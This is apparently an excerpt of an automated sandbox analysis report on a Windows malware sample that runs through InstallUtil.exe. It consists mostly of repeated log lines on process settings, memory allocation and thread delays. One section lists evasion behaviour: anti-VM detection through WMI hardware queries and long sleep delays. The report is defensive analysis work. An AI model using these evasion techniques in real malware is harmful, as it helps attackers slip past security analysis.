                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: tTXQS6DONV.exe PID: 7036, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: E60000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: 7E90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: 8E90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: A3F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: B3F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeMemory allocated: C3F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599452Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599124Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598905Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598249Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597374Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597046Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596718Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596499Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596390Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596171Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596061Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595952Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595841Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595734Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595624Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595515Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595406Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595296Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594968Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeWindow / User API: threadDelayed 2274Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeWindow / User API: threadDelayed 7565Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1389Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8472Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe TID: 2196Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exe TID: 2196Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6840Thread sleep count: 1389 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6840Thread sleep count: 8472 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599890s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599671s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599562s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599452s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599343s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599234s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599124s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -599015s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598905s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598796s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598687s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598578s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598468s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598359s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598249s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598140s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -598031s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597921s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597812s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597703s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597593s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597484s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597374s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597265s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597156s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -597046s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596937s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596828s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596718s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596609s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596499s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596390s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596281s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596171s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -596061s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595952s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595841s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595734s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595624s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595515s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595406s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595296s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595187s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -595078s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -594968s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1444Thread sleep time: -594859s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599452Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599124Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598905Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598249Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597374Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597046Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596718Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596499Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596390Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
